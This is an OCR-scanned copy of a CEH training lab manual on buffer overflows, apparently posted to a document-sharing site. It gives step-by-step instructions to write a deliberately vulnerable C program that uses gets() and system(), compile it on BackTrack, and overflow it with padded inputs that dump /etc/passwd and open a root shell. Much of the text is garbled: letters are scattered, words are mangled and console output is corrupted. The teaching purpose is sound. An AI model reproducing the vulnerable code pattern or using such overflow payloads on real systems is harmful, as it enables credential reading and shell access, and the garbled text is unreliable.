Ceh v8 labs module 18 buffer overflow

CEH

B u ffe r

L ab M a n u a l

O v e r flo w
M o d u le 18

M odule 18 - B u ffer O verflo w

B u f f e r O v e r f lo w

A

tta c k

In ab ffe oefo , w ilew gda t abiffer, t eb/ffer’ b u d r is
u r v rl w h ritin ta o
h
s o n ay
o er nan a ja e tmmr iso ewite .
v ru d d c n e oy v r r t n
I CON KEY

Lab Scenario

V a lu a b le
i n t o r m a d o a ________

S o u r c e : h t t p : / / w w w . 1c .u 1 1ic a 1 1 1 p . b r / ~ - s t o l f i / u r n a / b u t f e r - o f l o w

Test yo u r

H a c k e r s c o n t in u o u s ly lo o k t o r v u ln e r a b ilit ie s 11 1 s o f tw a r e o r a c o m p u t e r t o b r e a k in t o

k n o w le d g e

th e s y s te m b y e x p lo it in g th e s e v u ln e r a b ilit ie s .

sA

W e b e x e rc is e

m

W o r k b o o k r e v ie w

T h e m o s t c o m m o n v u l n e r a b i l i t y o f t e n e x p l o i t e d is d i e b u f f e r o v e r f l o w
a p ro g ra m

1 1 1 t e s t i n g d i e l e n g d i o f s t r i n g i f i t lie s w i t h i n it s v a l i d r a n g e . A

a w e a k n e s s b y s u b m it t in g a n e x tr a - lo n g in p u t t o
its

a llo c a t e d i n p u t b u f f e r ( t e m p o r a r y

v a r ia b le s ,

a tta c k , w h e r e

f a ilu r e o c c u r s e ith e r 1 1 1 a llo c a t in g s u f f ic ie n t m e m o r y f o r a n i n p u t s t r in g o r

cause

th e

p ro g ra m

to

h a c k e r c a n e x p lo it s u c h

th e p r o g r a m , d e s ig n e d t o

s to ra g e a re a ) a n d m o d if y

ju m p

to

u n in te n d e d

o v e r f lo w

th e v a lu e s o f n e a r b y

p la c e s ,

o r

even

r e p la c e

th e

p r o g r a m 's in s t m c t i o n s b y a r b it r a r y c o d e .

I f th e b u f fe r o v e r f lo w

b u g s li e 1 1 1 a n e t w o r k s e r v ic e d a e m o n , t h e a t t a c k c a n b e d o n e

b y d ir e c d y fe e d in g th e
o r d in a r y

s y s te m

p o is o n o u s

p o is o n o u s in p u t s tr in g

t o o l o r a p p lic a tio n , w i t h

s tr in g w i d i a d o c u m e n t o r a n

p a s s iv e b u f f e r o v e r f lo w

o v e r f lo w

bugs

to

th e

d a e m o n . I f th e

d ir e c t a c c e s s , th e

e m a il w h ic h , o n c e

a tta c k . S u c h a tta c k s a re e q u iv a le n t t o

th e s y s te m w i d i d ie s a m e u s e r I D

B u ffe r

no

a re

d o e s n o t p r o v id e s b u i lt - i n

b u g lie s 1 1 1 a n

h a c k e r a tta c h e s

th e

o p e n e d , w i l l la u n c h

a

a h a c k e r lo g g in g in t o

a n d p r iv ile g e s a s d ie c o m p r o m is e d p r o g r a m .

e s p e c ia lly

co m m o n

a rra y b o u n d

111

C

p ro g ra m s ,

s in c e

t h a t la n g u a g e

c h e c k in g , a n d u s e s a f in a l n u l l b y te t o

t h e e n d o t a s t r in g , in s te a d o f k e e p in g it s le n g t h 1 1 1 a s e p a ra te f ie ld . T o

m a rk

m ake dungs

w o r s e , C p r o v id e s m a n y lib r a r y f u n c t io n s , s u c h as s t r c a t a n d g e t l i n e , w h ic h c o p y
s tr in g s w i t h o u t a n y b o u n d s - c h e c k in g .
A s

an

eth ical h a c k e r

e x p e rt

k n o w le d g e o f w h e n a n d h o w

b a se d

and

b u ffe r

o v e r f lo w s

h eap -b ased

b u f fe r o v e r f lo w

111

p en etration te s te r,

and

b u f fe r o v e r f lo w

b u f f e r o v e r flo w s , p e r f o r m

p ro g ra m s ,

and

ta k e

you

m ust

have

o c c u rs . Y o u m u s t u n d e rs ta n d

sound

sta c k s-

pen etratio n te s ts f o r d e t e c t i n g
t o p revent p r o g r a m s f r o m

p r e c a u t io n s

a tta c k s .

Lab Objectives
T h e

o b je c t iv e

o v e r f lo w

o f t i n s la b is t o

a tta c k s t o

1 1 1 t in s la b , y o u

h e lp

s tu d e n ts t o le a r n a n d p e r f o r m

n e e d to :

■

P r e p a re a s c r ip t t o

■

C E H Lab Manual Page 902

b u ffe r

e x e c u te p a s s w o r d s .

o v e r f lo w

b u ffe r

R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n

Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.


■
■

& This lab can
be d e m o n stra te d
using B ack track
Virtual M achine

P e rfo rm

p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n

E n u m e ra te

a p a s s w o r d lis t

Lab Environment
W indows Server 2012

■

A

c o m p u te r r u n n in g w ith

■

A

V i r t u a l M a c h in e r u n n in g w i t h

■

A

w e b b ro w s e r w ith In te rn e t access

■

as H o s t m a c h in e

A d m in is t r a t iv e p r iv ile g e s t o 1 1 1 1 1 t o o ls

B ack T rack 5 R3

Lab Duration
T i m e : 2 0 A J in u t e s

Overview of Buffer Overflow
B u ffe r

o v e r f lo w

o v e rru n s

th e

is

an

b u f f e r 's

a n o m a ly w h e r e
b o u n d a ry

and

a p r o g r a m , w h ile

o v e r w r it e s

w n tin g

d a ta

a d ja c e n t m e m o r y . T in s

to
is

a

b u ffe r,

a s p e c ia l

c a s e o f v io la d o n o f m e m o r y s a fe ty . B u t t e r o v e r d o w s c a n b e tr ig g e r e d b y in p u t s d ia t
a re d e s ig n e d t o e x e c u te c o d e , o r a lte r th e w a y th e p r o g r a m
111

e r r a tic

c ra s h , o r

p ro g ra m

b e h a v io r ,

a

o f s y s te m

b re a c h

in c lu d in g

m e m o ry

s e c u r it y . T h u s ,

access

t lie v

a re

o p e r a te s . T i n s m a y r e s u lt

e rro rs ,

th e

in c o r r e c t

b a s is

o f m any

r e s u lt s ,

a

s o ftw a r e

v u ln e r a b ilit ie s a n d c a n b e m a lic io u s ly e x p lo it e d .

Lab Tasks

2 TASK 1
*
Overview

R e c o m m e n d e d la b s t o a s s is t y o u 1 1 1 b u f f e r o v e r f l o w :
■

E n u m e r a t in g P a s s w o rd s 11 1 “ D e f a u lt P a s s w o r d L is t ”
o

W r it e a C o d e

o

C o m p ile d ie C o d e

o

E x e c u te th e C o d e

o

P e rfo rm

o

O b t a i n C o m m a n d S h e ll

B u ff e r O v e r f lo w A t ta c k

Lab Analysis
A n a l y z e a n d d o c u m e n t t h e r e s u lt s r e la t e d t o t h e la b e x e r c is e . G i v e y o u r o p i n i o n o n
y o u r t a r g e t ’s s e c u r it y p o s t u r e a n d e x p o s u r e .

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R

R E L A T E D


T O

T H I S

I F

Y O U

H A V E

Q U E S T I O N S

L A B .

All Rights Reserved. Reproduction is Stricdy Prohibited.


B u f f e r O v e r flo w

E x a m

p le

In ab rf ro ejlo , w ilew da t abrf r t eb ffe'sb u d r is
/fe v i w h riting ta o /fe, h u r o n ay
o er nan a ja e t■ e oyiso ewite .
v ru d d c n mmr v r r t n
I C O N

K E Y

Lab Scenario

/ V a lu a b le
in f o r m a tio n

y*

111

c o m p u te r

s e c u r it y

and

p r o g r a m m in g ,

a

b u ffe r

o v e r f lo w ,

0 1‫ ־‬b u ffe r

o v e rru n ,

v u ln e r a b ilit y a p p e a rs w h e r e a n a p p lic a tio n n e e d s t o r e a d e x t e r n a l in f o r m a t io n s u c h as
T est yo ur
k n o w le d g e

a c h a r a c te r s trin g , th e
s iz e

s

W e b e x e rc is e

m

W o r k b o o k r e v ie w

o f

d ie

in p u t

r e c e iv in g

s tr in g ,

and

b u t t e r is r e l a t i v e l y

th e

a p p lic a tio n

s m a ll c o m p a r e d

d o e s n 't

check

th e

to

th e

s iz e .

p o s s ib le

T lie

b u ffe r

a l lo c a t e d a t r u n - t i m e is p l a c e d 0 1 1 a s t a c k , w h i c h k e e p s t h e i n f o r m a t i o n f o r e x e c u t i n g
fu n c tio n s , s u c h
o v e r f lo w in g

a s lo c a l v a r ia b le s , a r g u m e n t v a r ia b le s , a n d

s t r in g c a n a lte r s u c h in f o r m a t io n . T in s

th e

re tu rn

a d d re s s . T lie

a ls o m e a n s t h a t a n a t ta c k e r c a n

c h a n g e th e in f o r m a t io n as h e 0 1 ‫ ־‬s h e w a n ts to . F o r e x a m p le , th e a tta c k e r c a n in je c t a
s e r ie s o f m a c h i n e l a n g u a g e c o m m a n d s a s a s t r i n g d i a t a l s o l e a d s t o

th e e x e c u tio n o f

th e a t ta c k c o d e b v c h a n g in g t h e r e t u r n a d d re s s t o t h e a d d re s s o f th e a t ta c k c o d e . T l ie
u l t i m a t e g o a l is u s u a lly t o g e t c o n t r o l o f a p r iv i le g e d s h e ll b y s u c h m e t h o d s .

P r o g r a m m i n g la n g u a g e s c o m m o n l y a s s o c i a t e d w i d i b u f f e r o v e r f l o w s i n c l u d e
C + + , w h ic h

p r o v id e

b u ilt - in

110

p r o te c tio n

C

and

a g a in s t a c c e s s in g 0 1 ‫ ־‬o v e r w r i t i n g d a ta 1 1 1

a n y p a r t o f m e m o r y a n d d o n o t a u t o m a tic a lly c h e c k d ia t d a ta w r i t t e n t o a n a r r a y (th e
b u ilt - in

b u ffe r

ty p e )

is w i d i i n

th e

b o u n d a r ie s

o f

d ia t a rra y .

B ounds

c h e c k in g

can

p r e v e n t b u f f e r o v e r f lo w s .
A s a

pen etratio n te ste r,

s m a s lu n g
o v e r f lo w
t im e

a tta c k s .

Y o u

a tta c k s . Y o u

checks,

a d d re s s

y o u s h o u ld b e a b le t o im p le m e n t p r o t e c t io n

m ust
can

be

a w a re

o f

p re v e n t b u ffe r

o b f u s c a t io n ,

a ll

d ie

d e fe n s iv e

o v e r f lo w

r a n d o m iz in g

a tta c k s

lo c a tio n

a g a in s t s t a c k -

m e a s u re s
by
o f

fo r

b u ffe r

im p le m e n tin g
fu n c tio n s

111

11111-

lib c ,

a n a ly z in g s t a t ic s o u r c e c o d e , m a r k i n g s t a c k a s 1 1 0 1 1 - e x e c u t e , u s i n g t y p e s a fe la n g u a g e s
s u c h as J a v a , M L , e tc .

Lab Objectives
T h e

o b je c t iv e

o v e r f lo w

o f t i n s la b is t o

1 1 1 t in s la b , y o u


h e lp

s tu d e n ts t o le a r n a n d p e r f o r m

b u ffe r

t o e x e c u te p a s s w o r d s .
n e e d to :



■

P r e p a re a s c r ip t t o

o v e r f lo w

b u ffe r

■

R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n

■

P e rfo rm

■

E n u m e ra te

p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n
a p a s s w o r d lis t

Lab Environment

I T This lab can
be d e m o n stra te d
using B ack track
Virtual M achine

W indows Server 2012

■

A

c o m p u te r r u n n in g w ith

■

A

Y i r m a l M a c h in e r u n n in g w i t h

■

A

w e b b ro w s e r w ith

■

as H o s t m a c h in e

Administrative privileges to run tools

B ack T rack 5 R3

Internet a c c e s s

Lab Duration
T im e : 2 0 M in u t e s

Overview of Buffer Overflow
B u ff e r o v e r f lo w

ta k e s p la c e w h e n

buffer b e c a u s e o f i n s u f f i c i e n t
m em ory a d d re sse s, w h i c h a r e
t h i s o c c u r s w h e n c o p y i n g strin g s o f

w r itte n to a

c o rru p ts t h e d a t a v a l u e s 1 1 1
allo cated b u f f e r . M o s t o f t e n
f r o m on e buffer to another.

b o u n d s c h e c k in g
a d ja c e n t t o th e
c h a ra c te rs

d a ta

W hen die following program is compiled and run, it will assign a block o t memory
1 bytes long to hold die attacker string, strcpy function will copy the string
1
“ D D D D D D D D D D D D D D ” into an attacker string, w hich will exceed the buffer
size o f 11 bytes, resulting 111 buffer overflow.

Bffe Oe wxmleCd
u r vrflo Ea p oe
#include<stdio.h>

int main ( int argc, char **argv)

{
char Bufferfll] =
‫״‬AAAAAAAAAA‫;״‬
strcpylBuffer/DDDDDDDDDODD‫;}״‬
printf(“96n‫ .״‬Buffer);

0

0 1 2 3 4 5 6 7 8 9 1 1112
0
D D D D D D D D D D D D o

■
c

3 4

5 6 7

8 9

A A A A A A A A A A

1 2

3

4

String

10

0

i

S7 6‫״‬

return ;

}

This type o f vulnerability is prevalent in UNIX• and NT-based systems

Lab Tasks
S

TASK 1

W rite a Code


1.

Launch your B ack T rack 5 R3 Virtual Machine.

2.

For btlogui, type root and press Enter. Type the password as toor, and
press E nter to log 111 to BackTrack virtual machine.

Ethical Hacking and Countenneasures Copyright © by EC-Council


BackTrack on WIN 2N9STOSGIEN Virtual Machine Connection

‫־‬R ‫ * ״‬T

‫ י‬kVia C
lipboard V
iew

@3

1 ‫ ►וו‬h

‫פ‬

i . 0933761 HET: Registered protocol fa n ily 17

1 9 5 1 in u A T n ted Set 2 k y o rd a /d ;icc p tfo vi8 1 /'s 0 p t/'in u
.0 1 3 1 p t: T ra sla
e b a s c1 s^ la r1 ' l> 2 crio /in u p tl

1.0952761 Registering the dns resolver key type
1.0957031 registered ta sk stats version 1
1.1639921
Magic nunber: 12:12U:12G
1.1644561 acpi device:01: hash notches
1.105658) rtc.cn os 00:02: settin g syste* clock to 2012-09-25 11:06:59 UTC(1340571219)
1.165468) BIOS E O f a c il it y v0.16 2004-Jun-25, 0 devices found
D
1.1658621 C D information not availab le.
O
1.2378181 a ta l.0 6 : ATA-8: Uirtual HD, 1 .1 .0 , raax M D A
U M2
1.2389361 a ta l.0 6 : 33554432 scctors, nu lti 12B:
LBA48
1.2415511 ata2.06: AIAPI: Uirtual CD, , waxhUDt1A
2
1.2432671 ata2.06: configured for M D
U I1n2
1.2441181 a ta l.0 6 : configured for flU H
D flZ
1.244223) s c s i 0:0:0:6: Direct-Access
A
TA
Uirtual H
O
1 .1 . PQ: 6 AMSI: 5
1.2451571 sd 0:0:0:0: Isdal 33554432 512-byte logical blocks: (17.1 GB/16.0‫׳‬
GiB)
1.2455461 sd 0:0:0:0: Isdal 4096-hyte physical blocks
1.245974) sd 0:0:0:0: Isdal Write Protect Is o ff
1.2463841 sd 0:0:0:0: Attached sc si generic sgO type 0
1.2468141 sd 0:0:0:0: Isdal Urite cache: enabled, read cache: enabled, doesn't support D nr FIX
PT
1.2404231 sc s i 1:0:0 0: CD R M
O
Hsft
Uirtual CD/RO
M
1.0 PQ: 6 ANSI 5
1.2515061 sr6: sc si3 nnc drive: 0x/0 k tray
1.2526091 cdron: Uniform C H M driver Revision: 3.26
D U
1.2527931 sr 1:0:0:0: Attached sc si generic sg l type 5
1.25U657) sda: sdal r,da2 < xda5 >
1.2506591 *d 0:0:0:0: Inda I Att<1ch«d 8C5I disk
1.260263) Freeing uiuisimI kernel mmnnj; 96Hk rrixd
1.2608041 Urite protectI 1 | the karnal read only data: 1228Hk
M
1.26S6241 Freeing unused kernel Mwinj: 1732k freed
1.2699051 Freeing unused kernel »e 1 1 1492k freed
*nr j:
ling, please w a it. . .
1.2873151 udcv: starting version 151
1.2962U0I udevd (03): /•prot/‫׳‬U3/oun adj is deprecated, please use /p roc/tlJ/w n score adj instead.
1.3963921 Floppy driv e (s): fdO is 1.44f1
1.41 HH4 I FD 6 is an 02070.
C
2.02030?) Refined T8C clocksource calibration: 3692.970 fti‫. .־‬
‫׳‬

F IG U R E 1.1: BackTrack Log in
__ B u ffer overflow occurs

3.

T ype

s ta rtx

t o la u n c h d ie G U I .

when a program or process
BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection

tries to store m ore data in a

■ Re

1-1°‫־* ־‬

I.V44 CSpbeard Vie

I't • (- ©3 1 1 h
>
1►

buffer.

1.24S974I sd 0:0:6:6: (sdal Urite Protect Is o ff
1.246384) sd 0:0:6:6: Attached sc si generic sy6 type 6
1.2468141 sd 0:0:6:6: Isdal Urite cache: enabled, read cache: enabled, doesn't support DP0 or FU1
1.2404231 sc si 1:6:6:0: C R M
D O
Msft
Uirtual C
D-RO
M 1 0 PQ: 6 AMSI: 5
l.25150bl sr6: sc si3 ‫־‬rwc drive: 0x/0‫־‬x tray
1.2526091 cdrm: Uniforn CD-W* driver Revision: 3.20
1.2527931 sr !:0:6:6: Attached sc si generic sy l type 5
I .2586571 sda: sdal sda2 < sda5 >
1.2506591
sd 0:0:6 6: (sdal Attaclied SCSI disk
1.2602631 Freeing unused kernel ncmury: 'J6Uk freed
1 .2608041 N rite protecting the kernel read-only data: 122IM
Ik
1.265624) Frrelny umis.d kern■• I fiiMitry: 1732k freed
1.269985) Freeing unused kern•I nonary: 1492k freed
ading, please u a i t ...
1.2873151 udev: starting version 151
1.29620BI udevd (83): /‫׳‬prc!c/H3/’
0«jr»_<1dj is deprei^ted, please use /proc/G3‫׳׳‬o«1*»_score_adj instead.
1.3963921 Floppy driv e (s): fd6 is 1.440
1.4133841 FK 6 la an H2678.
2.0203071 R.rfl1 d TSC clocksource calibration: 3692 .970 MHz.
»
cklrack 5 IQ - 64 Bit bt t ty l
y la tined out a fter 60 seconds.

System information as of Iuc Sep 25 16:45:47 1ST 2012
Systea load:
Usage o f ✓:
Oenortj usage:
Swap usage:

0.08
72.3* o f 15.23GB
35‫׳׳‬
O
k

Processes:
72
Users logged In:
0
IP address for eth6: 10.0.0.14

Graph th is data and ■nrvvjr th is syste* ot https:/✓landscape.canonical .con✓

F IG U R E 1.2: BackTrack G U I Login-Startx Comm and
4.

m

B ackT rack 5 R3

G U I d e s k to p o p e n s , as s h o w n in d ie f o llo w in g s c r e e n s h o t.

Code w h ich is entered

in kedit is case-sensitive.




F IG U R E 1.3: BackTrack 5 R3 Desktop
5.

B ackT rack A pplications
gedit T ext Editor.

S e le c t t h e

‫־‬
y

t. >r*

*
v

A cc esso rie s

‫/ ל‬Mem (»_J
* ^

^ BackTtock

m e n u , a n d t h e n s e le c t

^

Oik uwg* Analyzer
oedlt T t Editor
fcx

4&
#***%
£

internet

flPlom
ce

| TWmlrwl

)14 other

‫ס‬

Tkrminator

WKSound 6 V^deo
0

ca

System Tools

<< b a c k tra c k

Program ming languages

com m only associated w ith
buffer overflows include C
and C + + .

F IG U R E 1.4: Launching gedit Text E d itor

6.

E n t e r d ie f o llo w in g c o d e 11 1 g e d it T e x t E d it o r

(Note:

t h e c o d e is c a s e -

s e n s itiv e ) .

# i n c l u d e < s t d i o . h>
v o i d m a i n ()

{
c h a r *name;
c h a r *command;
n ame =( ch ar * ) m a l l o c ( 10) ;
command=(char * ) m a l l o c (128) ;
p r i n t f ( " a d d r e s s o f name i s : %dn", name) ;
p r i n t f ( " a d d r e s s o f command i s : %dn",command);
p r i n t f ( " D i f f e r e n c e be twe en a d d r e s s i s : %d n", commandC E H Lab Manual Page 907



n ame );
p r i n t f ( " E n t e r y o ur n a m e : " ) ;
gets(name);
p r i n t f (" H e l l o % s n ", n a me ) ;
syst em( command) ;

}
‫>׳׳‬

v

x *u n s a v e d Docum ent 1 ‫ ־‬g e d it

File Edit View Search Tools Documents Help
^^^Jo p e n

▼ ^_Save

Undo

^ 9k

Ii=y1 Code is compiled using
the follow ing commend: gee

n *Unsaved Document 1 X

buffer.c biiffer.

# 1 nclude<std1 0 .h>
vo id m ain ()

{

char •name;
char •command;
name=(char * )m a llo c (1 0 );
command=(char * )m a llo c (1 2 8 );
p r in t f ( " a d d r e s s o f name i s : %dn",nam e);
p r in t f ( " a d d r e s s o f command is:%dn",com m and);
p r i n t f ( “ D iffe r e n c e between address i s :%dn“ ,command-name);
p r i n t f ( " E n t e r your name:“ ) ;
g e ts(n am e);
p r i n t f C ’H e llo %sn",nam e);
system ( command) ;

Plain Text ▼

Tab Width: 8 ▼

Ln 15, Col 2

F IG U R E 1.5: W riting code fo r execution
7.

‫ט‬

s a v e d ie p r o g r a m

S ave

as s h o w n 111 th e f o llo w in g s c re e n s h o t s c re e n s h o t as b u ffe r .c .

N o to o l can solve

completely die problem o f
buffer overflow , but die)‫■׳‬

b y s e le c tin g

File ‫ )־־‬S ave A s‫ )־‬root

N o w

o r s im p ly c lic k

__ _* *Unsaved Document 1 ‫ ־‬g edit
File Edit View Search Tools Documents Help

surely can decrease the
probability o f stack smashing
attacks.

N o w

Compile th e Code


la u n c h d ie c o m m a n d t e r m in a l a n d c o m p ile d ie

co d e

by

running:

gcc b u f f e r . c -o b u f f e r



/v

v

x

root@bt: -

File Edit View Terminal Help
root@ bt: ‫| #־־‬gcc b u ffe r.c -0 b u ffe rfj

The program executes
using follow ing command:

.!buffer

F IG U R E 1.7: BackTrack com piling the code
9.

I f th e re a re a n y e rro rs ,
/v

v

X

ignore

th e m .

r o o tc a b t: -

ro o tg b t:-# gcc b u ffe r .c ■0 b u ffe r
b u ffe r .c : In fu n c tio n 'm a in ':
—
b u f fe r . c : 6 : warning: in com p atible im p l ic i t d e c la ra tio n o f b u itfs tlH ^ u n c tio n ‘ mal

loc1
^•—— —

‫׳‬

b u f fe r . c : 8 : w arning: form at '%d' expects type 1 " ‫־‬n t ' , but a rg u m e n t^'tts s type 'ch
ar • ‫׳‬
b u ffe r .c :9 : warning: form at '%d' expects type , i n j ^ o u t argument 2 jM F t y p e *ch
ar »'
g
b u f f e r . c : 1 0 : w arning: form at '%d' expects type ' i n t ‫ , ׳‬but a rg um ent# has type ' I
ong i n t '
/tm p/ccx6 Y 3vl.o: In fu n c tio n m a in ':
b u ffe r .c : ( .te x t+ 6 x 9 0 ): warning: the g e ts ' fu n c tio n is dangerous a n ^ t a u ^ ^ i o t
be used.
root@bt:~# [ ]

: b a c k I tra c k
F IG U R E 1.8: BackTrack E rro r Message W in d o w

— j

1 0 . T o e x e c u te th e p r o g r a m

ty p e .

/buffer

E x ecu te th e Code


Ethical Hacking and Countemieasures Copyright © by EC-Council


‫־‬
‫־‬

*

ro o t@ b t: ~

r o o tg b t: •‫/ . | #־‬b u f fe r |
address o f name is : 20144144
address o f command i s :20144176
D iffe re n c e between address is :32
E nter your name:|

m

1

A n executable program
■

o n a disk contains a set o f
binary instructions to be
executed by die processor.

t r a c k ^ )1

back

.

‫ם‬
F IG U R E 1.9: BackTrack Executing Program
1 1 . T y p e a n y n a m e 1 1 1 d ie

Input

h e ld a n d p re s s

Enter;

h e re , u s in g

Jaso n

as a n

exam ple.
»

- :v

x ro o t@ b t

root@bt:~#
address o f
address o f
D iffe re n c e
Enter your

ca

B u ffer overflows w o rk

by manipulating pointers

. /b u f f e r
name is : 20144144
command i s : 26144176
between address is : 32
name:|‫ נ‬as |

b a ck I tra c k

(including stored addresses).

F IG U R E 1.10: In p u t Field

12. Hello J a s o n


s h o u ld b e p r in t e d .



/

- :v

x

ro o t@ b t

root@bt:~#
address o f
address o f
D iffe re n c e
E n te r your

./ b u ffe r
name i s : 26144144
command i s : 20144176
between address i s : 32
name: Jason

‫״‬oot®bt:~# fl

b a c k I tra c k
F IG U R E 1.11: H ello Jason

B

T A S K

4

Perform Buffer
Overflow A ttack

1 3 . N o w , o v e r f lo w t h e b u f f e r a n d e x e c u te t h e lis te d s y s te m c o m m a n d s .
14.

R u n d ie p r o g r a m

15. T y p e

Input

a g a in b y t y p i n g

./buffer.

12345678912345678912345678912345cat /e tc /p a s s w d 111 t l i e
h e ld .

1 6 . Y o u c a n v ie w a p r i n t o u t o f d i e p a s s w o r d h ie .
a

v

‫א‬

ro o t@ b t: -

root@ bt:~# ./ b u ffe r
address o f name i s : 17747984
D iffe re n c e between address i s :32
E n te r your name:|12345678912345678912345678912345cat /etc/passwd|
H e llo 12345678912345678912345678912345cat /etc/passwd
r o o t: x : e : 0 : r o o t: / r o o t: /bin/bash
daemon: x : 1 : 1 : daemon: /us r / s b in : /bin/sh
bin:x :2 :2 :bin:/bin:/bin/sh
sys: x : 3 : 3 : sys: /d e v : /bin/sh

Buffer overflow
vulnerbililties typically occur
in code that a programmer
cannot accratelv predict
buffer overflow behvior.

sync: x : 4 :65534:sync: / b i n : /b in /s y n c
games: x : 5 : 60: games: /us r/games: /bin/sh

man: x : 6 : 1 2 : man: /v a r/cache/m an: /b in /s h
I p : x : 7 : 7 : I p : / v a r / s p o o l/lp d : /b in /s h
m a il: x^S: 8 : m a il: /va r/m aiU / b in / sh
_
news: x t : 9: news: /va r/sp o jj/n e w s: /tj^n/shg
luiicp: x :1 e : l e : ifticjfc/var/spdol/uucp ijrbinTMf
proxy :x: 13:13:proxy:/b1n:/b1n/sh
I
L w w d ata:x:3 3 :3 3 :w w w - d ata:/var/w w */b inft(l I
I
backup: x : 3 4 :34 :backup: /v a r/ b a ck u p f/ b in / sh
U s t :x :3 8 :3 8 :H a ilin g L i s t H a n a g e r :/ v a r / lis t:/ b in / s h
i r e : x :3 9 :3 9 :i re d : /va r / ru n / i re d : /bin/sh
g n a ts :x :4 1 :4 l:G n a ts Bug-Reporting System (a d m in ):/ v a r/ lib / g n a ts :/ b in / s h
( lib u u id : x :1 0 0 :1 6 1 ::/ v a r / lib / lib u u ld : /bin/sh

F IG U R E 1.12: Executing Password

■m.

T A S K

5

Obtain Com m and
Shell


1 7 . N o w , o b t a i n a C o m m a n d S h e ll.
18.

a g a i n ./buffer a n d t y p e
12345678912345678912345678912345/ b i n / s h 111 the Input field.

R u n d ie p r o g r a m

Ethical Hacking and Countenneasures Copyright © by EC-Council


/
v

v

x root@ bt: -


m

root@bt:~# . / b u f f e r
address o f name is : 24616976
D iffe re n c e between address is :32
E nter your nameJ12345678912345678912345678912345/bm/sh|
H e llo 12345678912345678912345678912345/bin/sh
s h-4.1#
s h-4.1#
sh-4.1# [ ]

Code scrutiny (writing

secure code) is die best
possible solution to
b uffe rflow attacks.

back

tra c k

F IG U R E 1.13: Executing 12345678912345678912345678912345/bin/sli
19. T y p e

Exit 1 1 1

S h e ll K o n s o l e 0 1 ‫ ־‬c lo s e t h e p r o g r a m .

Lab Analysis
A n a l y z e a n d d o c u m e n t d i e r e s u lt s r e la t e d t o d i e la b e x e r c is e . G i v e y o u r o p i n i o n 0 1 1
y o u r t a r g e t ’s s e c u r it y p o s t u r e a n d e x p o s u r e .

T o o l/U tility

I n f o r m

a tio n

C o lle c te d /O b je c tiv e s

A c h ie v e d

■

A d d r e s s o f n a m e is : 2 4 6 1 6 9 7 6

■

A d d r e s s o f c o m m a n d is : 2 4 6 1 7 0 0 8

■

D iffe r e n c e

■

E n te r y o u r n a m e :

b e t w e e n a d d r e s s is : 3 2

1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in / s h
B u ffe r O v e rflo w

■

H e llo
1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in /s h

‫י‬

T A L K

T O

s h -4 .1 #

‫י‬

P L E A S E

s h -4 .1 #

‫י‬

s h -4 .1 #

Y O U R

I N S T R U C T O R

R E L A T E D


T O

T H I S

I F

Y O U
L A B .

H A V E

Q U E S T I O N S


Questions
1.

E v a lu a t e v a r io u s m e th o d s t o

2.

A n a ly z e h o w

3.

E v a lu a t e a n d lis t th e c o m m o n c a u s e s o f b u f f e r - o v e r f lo w
.N E T

I n te r n e t

D


d e te c t r u n - tim e

b u f f e r o v e r f lo w .
e rro rs u n d e r

la n g u a g e .

C o n n e c tio n

Y e s

P la tf o r m

0

to

p r e v e n t b u f f e r o v e r f lo w .

R e q u ir e d

0 N

o

S u p p o r te d

C la s s r o o m

0

!L a b s


Ceh v8 labs module 18 buffer overflow

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (18)

En vedette

En vedette (20)

Similaire à Ceh v8 labs module 18 buffer overflow

Similaire à Ceh v8 labs module 18 buffer overflow (20)

Dernier

Dernier (20)

Ceh v8 labs module 18 buffer overflow